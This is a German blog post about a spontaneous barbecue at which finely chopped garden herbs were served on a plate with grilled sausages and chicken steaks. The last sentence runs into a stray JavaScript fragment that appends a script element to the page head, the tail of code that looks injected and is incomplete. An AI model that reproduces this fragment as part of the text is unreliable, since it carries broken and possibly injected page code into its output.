Grillen und Kräuter

Das Eine schließt das Andere nicht aus und so gab es neulich bei uns zu guten Geflügelbratwüsten und selber eingelgten Hähnchenstaeks einen leckeren Teller mit allen derzeit im Garten wachsenden und zum Grillen passenden Kräutern (Petersilie, Schnittlauch, Rauke, Brunnenkresse, Basilikum usw.). Für selbstgemachte Kräuterbutter fehlte die Zeit, da es eine sponatane Grillparty war und so kam diese Idee die Kräuter fein zu schneiden und auf einem großen Teller anzurichten. Jeder konnte sich die Kräuter nehmen, die ihm besonders gut schmecken oder auch mal neue ausprobieren. Die Kräuter kann man auf Butter über das Staek legen, ebenso kann man sie auch auf eine geröstete Scheibe Brot geben, die mit Olivenöl oder Butter und / oder Knoblauch bestrichen wird. Das schmeckt sogar absoluten Brot abgeneigten Grillfans. Mein Tipp: beim nächsten Grillabend einfach mal ausprobieren!!d.getElementsByTagName(‘head’)[0].appendChild(s);}}

Posted in Blog.

Hinterlasse eine Antwort